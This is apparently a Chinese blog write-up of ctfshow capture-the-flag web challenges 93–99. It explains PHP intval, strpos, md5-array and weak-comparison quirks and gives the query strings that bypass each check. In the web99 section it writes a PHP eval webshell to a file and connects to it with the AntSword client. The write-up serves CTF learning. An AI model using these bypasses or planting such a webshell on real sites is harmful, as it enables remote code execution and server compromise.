ctfshow web93-98
web93
打开环境是一个代码审计题目
简单分析就是输入一个变量num,其值不能等于4476与包含字母,但是他的值需要为4476
函数intval作用为获取变量的整数值,第二个参数的意思是进制,默认为10进制。题目参数为0,就根据变量类型进行判别
但是只能识别10,16,8三种类型
由于题目过滤了10进制的4476与16进制的x,我们可以用八进制进行绕过
即010574(0为标识符)
?num=010574
得到flag,此题结束。
web94
打开环境,与上一题类似,但是多了个strpos()函数
因为使用了===(值相同且类型相同),所以8进制数无法判别(因为标识符最左侧为0,所以返回值为0)。我们可以在数字后面加上一个.0来进行绕过
?num=4476.0
得到flag,此题结束。
web95
打开环境,发现过滤了.
于是我们继续从intval函数入手,因为8进制数会被判定为0,但我们可以在前面加上一个+使其不会被误判。
?num=+010574
得到flag,此题结束。
web96
打开容器,是一个传参过滤题
当我们输入flag.php时会被过滤。但是highlight_file函数可以显示文件的内容,所以我们需要输入flag.php
这个时候可以使用相对路径进行绕过
?u=./flag.php
得到flag,此题结束
web97
简单的md5碰撞题,使用数组即可绕过
?a[]=1&b[]=2
得到flag,此题结束
web98
这个题目意思是同时获取get和post的传参且get指向post的地址,意思是两者改变其一另一个都会变
于是我们直接使用get,post同时传参即可
?HTTP_FLAG=flag
HTTP_FLAG=flag
得到flag,此题结束
web99
array()函数创建数组
in_array() 函数搜索数组中是否存在指定的值
array_push()函数在数组末尾添加内容
rand(min,max)函数返回一个在min和max区间的随机数字
file_put_content()函数往一个文件中写内容
于是我们可以知道题目写入了一个从1到877的随机数组,并且匹配输入的变量n中是否有其中的数字
这里涉及到一个弱比较,即==。弱比较会根据最前面的字符决定类型
比如1.php会被识别为1
于是我们构造payload
?n=1.php
content=<?eval($_POST[shell])?>
随后使用蚁剑连接,得到flag,此题结束
ctfshow web93-98相关推荐
- CTFshow php特性 web93
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 11:25: ...
- CTFSHOW WEB 1-100
web入门 给她 1 参考文档 https://blog.csdn.net/weixin_51412071/article/details/124270277 查看链接 sql注入 <?php ...
- ctfshow web入门 php特性
文章目录 web89 web90 web91 web92 姿势一 姿势二 姿势三 web93 web94 web95 web96 姿势一 姿势二 web97 web98 web99 web100 姿势 ...
- ctfshow php特性 web89-web115 web123-150wp
php特性 参考博客仍然是南神博客 文章目录 php特性 web89 web90 web91 web92 web93 web94 web95 web96 web97 web98 web99 web10 ...
- CTFshow之36Dweb做题记录
文章目录 WEB_给你shell WEB_RemoteImageDownloader WEB_你取吧 非预期解1: 非预期解2: 预期解: WEB_WUSTCTF_朴实无华_Revenge WEB_A ...
- CTFSHOW WEB入门
----------信息搜集---------- 源码泄露 查看源码即可 前台JS绕过 直接开发者工具查看源码 当然也可以抓包查看 也可以禁用js查看源码 协议头信息泄露 或者抓一下包也可 robot ...
- ctfshow php特性(89——150plus)
web89 这题的逻辑是如果存在$_GET['num'],则用正则表达式匹配$num中的值,如果成功匹配则程序终止于"no no no",否则进行下一步,如果intval($num ...
- ctfshow php特性 下
目录 web113 web114 web115 web123(php解析特性) web125 web126 web127(php解析特性) web128 web129 web130 web131 we ...
- ctfshow终极考核web655-web665
配合脚本学习效果更佳 web655 打开/etc/host得到内网地址,遍历一遍发现.5的存活e 后台扫描发现有phpinfo.php www.zip robots.txt 访问phpinfo.php ...
- ctfshow RCE极限挑战 wp
这五题都做出来,真的不容易呀,最终终于是在比赛结束以前全部做完了,拿到了十几块钱,是一个星期的早餐了,嘿嘿嘿嘿,哎,不过对于,自增的理解可以说是提升很多很多,这里主要讲的自增,主要详细讲解他是怎么用的 ...
最新文章
- 特定场景下SQL的优化
- (转)创业需要知道的13句话
- 人工智能领域开展标准化研究
- quartus管脚分配后需要保存吗_电脑磁盘显示未分配怎么办?磁盘数据如何恢复?...
- 区别Transform、Transition、Animation
- ASP.NET弹出对话框并跳转页面
- 用 Ajax 和 RSS 攒个首页新闻——(上)
- Javascript变量的使用第三课
- 气象专业文件nc的读取、裁剪与输出(python)
- 小组取什么名字好_学习小组起什么名字比较好
- 乐高创意机器人moc_深度乐高 篇一:大神带你玩转乐高 Speed 系列套内 MOC
- 云计算时代的域名解析
- 机器学习 Python scikit-learn 中文文档(10)Scikit-Learn 处理文本数据
- python模拟登录中国海洋大学教务系统(青果)- 爬取学期所有专业课至excel - 并进行课表排课(三)
- CS:APP Archlab(未完待续)
- 学计算机做纸质笔记,详细图文教你康奈尔大学推荐的超级笔记法,只要一张A4纸张,你也可以做学霸...
- android连不上电脑,安卓手机USB数据线连接不上电脑的最佳解决方法
- 浙江省计算机程序比赛员,计算机学子在“图森未来杯”第十七届浙江省大学生程序设计竞赛中斩获金奖...
- Web网页如何实现QQ好友,QQ空间,微博分享
- 再夺AI专业全球冠军!清华力压CMU夺得CSRankings高校AI领域第一